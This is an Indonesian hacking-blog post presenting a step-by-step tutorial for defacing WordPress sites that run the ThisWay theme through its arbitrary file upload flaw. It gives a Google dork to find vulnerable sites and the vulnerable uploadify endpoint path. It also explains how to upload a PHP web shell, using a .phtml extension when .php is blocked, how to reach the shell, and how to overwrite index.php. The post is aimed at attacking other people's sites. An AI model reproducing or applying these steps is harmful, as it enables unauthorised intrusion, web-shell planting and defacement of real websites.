Thanks For Support Us Don't Forget Us In Your Heart And Your Mind

Copyright © Sorry We're Closed | Published By Gooyaabi Templates | Powered By Blogger
Design by WebSuccessAgency | Blogger Theme by NewBloggerThemes.com | BTheme.net

Visitor Counter

Trustmark

Facebook


Selamat Datang Di Bagian Intelligence Gathering Garuda Security Hacker

Dengan Mengakses Laman Ini Berarti Anda Setuju Bahwa Setiap Dampak Dan Resiko Penyalahgunaan Konten Ditanggung Oleh Anda Sendiri

Informasi di Tiap Laman Akan Terus diupdate secara berkala

Friday, July 22, 2016

Deface WordPress Theme ThisWay Arbitrary File Upload

Deface WordPress Theme ThisWay Arbitrary File Upload

Deface WordPress Theme ThisWay Arbitrary File Upload
Quote Di Gambar Untuk Penyemangat

Ok, Assalamualaikum.. Udah pada lama ya nunggu tutorial deface ?? :v Kasian.. karena saya juga nyari exploit apa yang masih bisa di gunakan. Pas lagi jalan-jalan di Blog TKJ Cyber Art nemu exploit ya masih bisa di pake walaupun udah lawas.. yaitu "Deface WordPress Theme ThisWay Arbitrary File Upload". Ok langsung intip tutorialnya yak :p

Bahan-Bahan :

1. DVD Hentai (yang HD)

2. Dork :
inurl:"/wp-content/themes/ThisWay/"

3. Exploit  /includes/uploadify/upload_settings_image.php


Step by Step :

1. Dorking di gugel, kalo saya sih pakai dorking image :p

2. Pilih targetnya,, setelah itu masukan exploit, contoh : http://tumbal.co.li/[path]/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php

3. Kalo Vuln akan seperti ini (liat gambar cuk, gambar hentai nih)

Deface WordPress Theme ThisWay Arbitrary File Upload
Vuln nih :)
 4. Copy url target :v lalu buka csrf yang udah di kasih di atas. masukan urlnya postname biarkan Filedata, klik next, lalu upload shell kalian
Note : jika tidak bisa shell.php coba shell.phtml

5. Jika berhasil upload hasilnya akan seperti ini

Deface WordPress Theme ThisWay Arbitrary File Upload
Sebaiknya catat nama shell kalian
6. Akses shellnya. http://tumbal.co.li/wp-content/uploads/tahun/bulan/settingsimage_random.phtml

7. Jreng jrengg, kalo mau nebas index.php sebaiknya backup dulu ya :p bug nya jangan lupa di tutup.

Source : TKJ Cyber Art

Thanks To :

ALLAH SWT. : atas segala-galanya

Kedua Orangtuaku : atas segala-galanya

TKJ Cyber Art : atas tutorial dan motivasinya

Yukinoshita 47 : atas ilmu-ilmunya

Drach Levia (nama aliasnya banyak) : atas mahakarya nya :v

Like Juga ya, Fanspage kami :*


Stay Tune and Keep Learning :) See You
Share:

Facebook

Followers

Cari Konten Blog

Motivasi Kami Sepanjang Masa

Motivasi Kami Sepanjang Masa

Featured

Popular Posts